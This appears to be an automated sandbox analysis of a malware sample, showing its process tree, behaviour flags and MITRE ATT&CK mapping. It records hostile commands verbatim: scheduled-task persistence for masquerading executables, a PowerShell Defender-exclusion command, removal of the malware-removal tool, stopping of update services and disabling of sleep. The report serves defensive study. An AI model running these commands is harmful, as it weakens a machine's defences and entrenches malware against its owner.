schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\All Users\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5044

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:3396

C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:6112

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:5128

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:5212

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:5264

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:1380

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:5464

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:3600

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:5600

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:5508

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:6028

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2980

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:2720

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:2572

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:224

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5388

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:3536

C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe
"C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe"
1⤵
PID:2468

C:\Users\Default\PrintHood\System.exe
C:\Users\Default\PrintHood\System.exe
1⤵
PID:2020

C:\Program Files (x86)\MSBuild\Microsoft\csrss.exe
"C:\Program Files (x86)\MSBuild\Microsoft\csrss.exe"
1⤵
PID:3672

C:\Users\All Users\dllhost.exe
"C:\Users\All Users\dllhost.exe"
1⤵
PID:3944

C:\Program Files\Windows Sidebar\Shared Gadgets\backgroundTaskHost.exe
"C:\Program Files\Windows Sidebar\Shared Gadgets\backgroundTaskHost.exe"
1⤵
PID:2736

C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe
"C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe"
1⤵
PID:4440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery